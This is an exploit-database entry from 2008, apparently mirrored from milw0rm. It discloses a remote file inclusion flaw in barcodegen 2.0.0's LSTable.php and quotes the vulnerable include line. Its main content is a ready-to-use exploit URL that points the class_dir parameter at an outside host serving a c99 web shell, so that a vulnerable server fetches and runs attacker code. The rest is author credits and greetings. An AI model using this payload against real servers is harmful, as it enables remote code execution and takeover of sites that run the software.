barcodegen 2.0.0 - 'class_dir' Remote File Inclusion



EKU-ID: 14456 CVE: OSVDB-ID:
Author: Br0k3n H34rT Published: 2008-09-26 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Name : barcodegen <= 2.0.0 Remote File Inclusion Vulnerability

# Download From : http://www.barcodephp.com/processdownload.php?id=barcodegen.1d-php4.v2.0.0.zip

# Found By : Br0k3n H34rT

# Home Page : WwW.Sec-Code.CoM

============================================================================

# Vulne Code : In File : LSTable.php In Line 21 :

include( $class_dir.'/Table_template.php' );

# Exploit :

http://WwW.Sec-Code.CoM/barcodegen.1d-php4.v2.0.0/class/LSTable.php?class_dir=http://SITE.COM/shell/c99.txt?

============================================================================

# Greet To :

My Master RoMaNcYxHaCkEr , And All My Members

# Note : Eid Mobarak :)

# bEST wISHES

# milw0rm.com [2008-09-26]